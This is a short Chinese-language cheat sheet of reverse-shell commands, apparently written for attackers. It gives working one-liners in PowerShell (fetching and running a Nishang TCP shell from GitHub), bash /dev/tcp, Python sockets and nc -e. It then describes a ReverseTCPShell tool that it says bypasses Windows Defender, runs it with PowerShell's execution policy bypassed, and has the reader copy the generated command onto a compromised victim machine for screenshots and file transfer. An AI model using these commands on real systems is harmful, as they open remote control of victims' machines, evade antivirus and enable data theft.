一、常用反弹命令
1、powershell反弹(win7测试可以)
powershell.exe IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress xxx.xxx.xxx.xxx -port 8888
2、 bash反弹(linux)
bash -i >& /dev/tcp/555.666.777.888/4444 0>&1
3、python反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.16.1.130",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
4、nc反弹
nc 172.16.1.130 4444 -t -e /bin/bash
二、powershell ReverseTCPShell反弹shell
1、该脚本可以bypass windows defender(2019年12月24日)
2、安装
https://github.com/ZHacker13/ReverseTCPShell
3、执行
直接执行ps1脚本可能会失败,使用bypass安全策略执行
powershell.exe -ExecutionPolicy Bypass -File .\ReverseTCP.ps1
4、生成两种命令,一种在cmd执行,一种在ps执行
5、copy命令到肉鸡上执行,反弹成功
6、常用命令
screenshot 截屏
dir
upload
download